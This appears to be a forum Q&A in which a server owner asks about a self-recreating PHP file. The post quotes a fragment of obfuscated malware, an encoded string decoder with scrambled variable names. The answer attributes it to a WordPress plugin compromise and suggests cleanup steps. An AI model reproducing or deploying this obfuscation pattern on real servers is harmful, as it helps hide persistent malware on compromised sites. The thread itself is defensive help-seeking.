Strange PHP code found in file on server

Question

Sorry if this is the wrong site to post on.

Basically, I have a server and this file keeps creating itself. The file is a PHP file and contains code:

    <?php
    $GLOBALS['XfZi37Vc'] = $_SERVER;
    function ruexxCV1QobH($uiBP25)
                                                            {$MISwZvode = "";global $PYJ9QSAA;

    for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
            {$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
    if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;

${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3@@G9CJJ");
                        ${YkT1GO68Y3rXB(",g0@#&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$");
                ${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~(");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
        function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
        ${fW1u5W74("gh\"Co[")} = lpkBre6("*77@0>A-DE6@6C9;");
${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27");

I have never seen code like this before. Can anyone tell me what it is exactly doing?

Answer 1

This is a hack that happened to your Wordpress. Probably because you are using an outdated third party plugin. These can be somewhat difficult to detect, but the code is probably being used to place ads, or redirect your users to outside content or malware.

You should remove this code and update all your plugins.

Keep in mind that this code could have also injected code into your Wordpress database. Especially if you have a plugin that enables 'eval' in Wordpress, meaning code could be retrieved from the database and eval'd.

If that doesn't solve the problem, you should start disabling third party plugins until you find the root of the problem.

Wordpress is VERY easy for automated scripts to detect and third party plugins could have been written by someone who does not know anything about security. You need to be very wary when using them, even if they come from Wordpress.org.